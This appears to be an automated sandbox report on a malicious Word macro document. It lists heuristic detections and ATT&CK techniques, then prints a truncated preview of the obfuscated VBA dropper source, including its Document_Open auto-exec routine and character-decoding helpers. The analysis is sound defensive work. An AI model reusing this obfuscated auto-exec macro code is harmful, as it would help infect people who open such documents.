Verdict: MALICIOUS
Risk Score: 264

Malware Insights

MITRE ATT&CK
- T1566.001 Spearphishing Attachment
- T1059.005 Visual Basic
- T1140 Deobfuscate/Decode Files or Information
The sample is a Microsoft Word document containing VBA macros, specifically a Document_Open macro designed to execute upon opening. It uses a lure to convince the user to enable macros, a common tactic for malware droppers. The macro attempts to deobfuscate and likely execute a payload, as indicated by the CreateObject and GetObject calls and the presence of a large, encoded blob within the macros.bas file.
Heuristics (9)
- ClamAV: Doc.Dropper.Agent-6485293-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Dropper.Agent-6485293-0
- VBA macros detected (medium, OLE_VBA_MACROS, 4 related findings): Document contains VBA macro code
- Document_Open macro (high, OLE_VBA_DOCOPEN): Document_Open macro
- CreateObject call (high, OLE_VBA_CREATEOBJ): CreateObject call
- GetObject call (high, OLE_VBA_GETOBJ): GetObject call
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Macro/content-enable lure (medium, SE_ENABLE_LURE): Document instructs the user to enable macros or editing, a common technique used by malware droppers to bypass Office macro security settings
- Suspicious extracted artifact (info, EXTRACTED_FILE_STATIC_TRIAGE): One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - http://www.w3.org/1999/02/22-rdf-syntax-ns# (in document text, OLE body)
  - http://ns.adobe.com/xap/1.0/ (in document text, OLE body)
  - http://ns.adobe.com/xap/1.0/mm/ (in document text, OLE body)
  - http://ns.adobe.com/xap/1.0/sType/ResourceEvent# (in document text, OLE body)
  - http://ns.adobe.com/photoshop/1.0/ (in document text, OLE body)
  - http://purl.org/dc/elements/1.1/ (in document text, OLE body)
  - http://ns.adobe.com/tiff/1.0/ (in document text, OLE body)
  - http://ns.adobe.com/exif/1.0/ (in document text, OLE body)
  - http://schemas.openxmlformats.org/officeDocument/2006/bibliography (in document text, OLE body)
  - http://schemas.openxmlformats.org/officeDocument/2006/cusE (in document text, OLE body)
  - http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 272757 bytes |

SHA-256: 8b51181668177f57ac0a541a83597855e4be28398f020b8766c55dde499ef3db

Detection
- ClamAV: No threats found
- Obfuscation or payload: likely. Carved artifact contains 210 long base64-like blob(s).

Preview script (first 1,000 lines of the extracted script):

```vba
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "CommandButton1, 1, 0, MSForms, CommandButton"
Attribute VB_Control = "TextBox1, 0, 1, MSForms, TextBox"
Option Explicit
Private Sub CommandButton1_Click()
MsgBox " ******* Certificate Failed ******* "
End Sub
Sub Document_Open()
On Error Resume Next
Dim aXSe, AFhP, kIMD As String
aXSe = BlvR(TJgm)
AFhP = BlvR(YSCe)
kIMD = BlvR(hkYa)
Dim XpGP As String
XpGP = ucaS(ThNz(144, 195))
XpGP = wjZJ(XpGP, ucaS(ThNz(58, 89)))
XpGP = wjZJ(XpGP, ucaS(ThNz(28, 110)))
XpGP = wjZJ(XpGP, ucaS(ThNz(7, 110)))
XpGP = wjZJ(XpGP, ucaS(ThNz(186, 202)))
XpGP = wjZJ(XpGP, ucaS(ThNz(29, 105)))
XpGP = wjZJ(XpGP, ucaS(ThNz(7, 110)))
XpGP = wjZJ(XpGP, ucaS(ThNz(59, 85)))
XpGP = wjZJ(XpGP, ucaS(ThNz(231, 128)))
XpGP = wjZJ(XpGP, ucaS(ThNz(93, 115)))
XpGP = wjZJ(XpGP, ucaS(ThNz(106, 44)))
XpGP = wjZJ(XpGP, ucaS(ThNz(7, 110)))
XpGP = wjZJ(XpGP, ucaS(ThNz(41, 69)))
XpGP = wjZJ(XpGP, ucaS(ThNz(243, 150)))
XpGP = wjZJ(XpGP, ucaS(ThNz(144, 195)))
XpGP = wjZJ(XpGP, ucaS(ThNz(182, 207)))
XpGP = wjZJ(XpGP, ucaS(ThNz(60, 79)))
XpGP = wjZJ(XpGP, ucaS(ThNz(29, 105)))
XpGP = wjZJ(XpGP, ucaS(ThNz(243, 150)))
XpGP = wjZJ(XpGP, ucaS(ThNz(92, 49)))
XpGP = wjZJ(XpGP, ucaS(ThNz(206, 129)))
XpGP = wjZJ(XpGP, ucaS(ThNz(47, 77)))
XpGP = wjZJ(XpGP, ucaS(ThNz(36, 78)))
XpGP = wjZJ(XpGP, ucaS(ThNz(243, 150)))
XpGP = wjZJ(XpGP, ucaS(ThNz(58, 89)))
XpGP = wjZJ(XpGP, ucaS(ThNz(29, 105)))
Dim zXJA As String
zXJA = aXSe
Dim lgvA As String
lgvA = ""
lgvA = wjZJ(lgvA, ucaS(ThNz(214, 149)))
lgvA = wjZJ(lgvA, ucaS(ThNz(163, 153)))
lgvA = wjZJ(lgvA, "\")
lgvA = wjZJ(lgvA, ucaS(ThNz(223, 143)))
lgvA = wjZJ(lgvA, ucaS(ThNz(28, 110)))
lgvA = wjZJ(lgvA, ucaS(ThNz(214, 185)))
lgvA = wjZJ(lgvA, ucaS(ThNz(231, 128)))
lgvA = wjZJ(lgvA, ucaS(ThNz(28, 110)))
lgvA = wjZJ(lgvA, ucaS(ThNz(210, 179)))
lgvA = wjZJ(lgvA, ucaS(ThNz(92, 49)))
lgvA = wjZJ(lgvA, ucaS(ThNz(31, 91)))
lgvA = wjZJ(lgvA, ucaS(ThNz(210, 179)))
lgvA = wjZJ(lgvA, ucaS(ThNz(29, 105)))
lgvA = wjZJ(lgvA, ucaS(ThNz(210, 179)))
lgvA = wjZJ(lgvA, "\")
lgvA = wjZJ(lgvA, ucaS(ThNz(146, 197)))
lgvA = wjZJ(lgvA, ucaS(ThNz(7, 110)))
lgvA = wjZJ(lgvA, ucaS(ThNz(59, 85)))
lgvA = wjZJ(lgvA, ucaS(ThNz(34, 70)))
lgvA = wjZJ(lgvA, ucaS(ThNz(214, 185)))
lgvA = wjZJ(lgvA, ucaS(ThNz(45, 90)))
lgvA = wjZJ(lgvA, ucaS(ThNz(60, 79)))
lgvA = wjZJ(lgvA, ucaS(ThNz(31, 91)))
lgvA = wjZJ(lgvA, ucaS(ThNz(243, 150)))
lgvA = wjZJ(lgvA, ucaS(ThNz(251, 157)))
lgvA = wjZJ(lgvA, ucaS(ThNz(243, 150)))
lgvA = wjZJ(lgvA, ucaS(ThNz(59, 85)))
lgvA = wjZJ(lgvA, ucaS(ThNz(34, 70)))
lgvA = wjZJ(lgvA, ucaS(ThNz(243, 150)))
lgvA = wjZJ(lgvA, ucaS(ThNz(28, 110)))
lgvA = wjZJ(lgvA, ucaS(ThNz(144, 195)))
lgvA = wjZJ(lgvA, ucaS(ThNz(243, 150)))
lgvA = wjZJ(lgvA, ucaS(ThNz(28, 110)))
lgvA = wjZJ(lgvA, ucaS(ThNz(92, 42)))
lgvA = wjZJ(lgvA, ucaS(ThNz(7, 110)))
lgvA = wjZJ(lgvA, ucaS(ThNz(58, 89)))
lgvA = wjZJ(lgvA, ucaS(ThNz(243, 150)))
lgvA = wjZJ(lgvA, ucaS(ThNz(93, 115)))
lgvA = wjZJ(lgvA, ucaS(ThNz(7, 110)))
lgvA = wjZJ(lgvA, ucaS(ThNz(59, 85)))
lgvA = wjZJ(lgvA, ucaS(ThNz(7, 110)))
iFUN lgvA, zXJA, XpGP
Dim ZCmJ As String
ZCmJ = ""
ZCmJ = wjZJ(ZCmJ, ucaS(ThNz(214, 149)))
ZCmJ = wjZJ(ZCmJ, ucaS(ThNz(163, 153)))
ZCmJ = wjZJ(ZCmJ, "\")
ZCmJ = wjZJ(ZCmJ, ucaS(ThNz(223, 143)))
ZCmJ = wjZJ(ZCmJ, ucaS(ThNz(28, 110)))
ZCmJ = wjZJ(ZCmJ, ucaS(ThNz(214, 185)))
ZCmJ = wjZJ(ZCmJ, ucaS(ThNz(231, 128)))
ZCmJ = wjZJ(ZCmJ, ucaS(ThNz(28, 110)))
ZCmJ = wjZJ(ZCmJ, ucaS(ThNz(210, 179)))
ZCmJ = wjZJ(ZCmJ, ucaS(ThNz(92, 49)))
ZCmJ = wjZJ(ZCmJ, ucaS(ThNz(31, 91)))
ZCmJ = wjZJ(ZCmJ, ucaS(ThNz(210, 179)))
ZCmJ = wjZJ(ZCmJ, ucaS(ThNz(29, 105)))
ZCmJ = wjZJ(ZCmJ, ucaS(ThNz(210, 179)))
ZCmJ = wjZJ(ZCmJ, "\")
ZCmJ = wjZJ(ZCmJ, ucaS(ThNz(124, 57)))
ZCmJ = wjZJ(ZCmJ, ucaS(ThNz(92, 4 ... (truncated)
```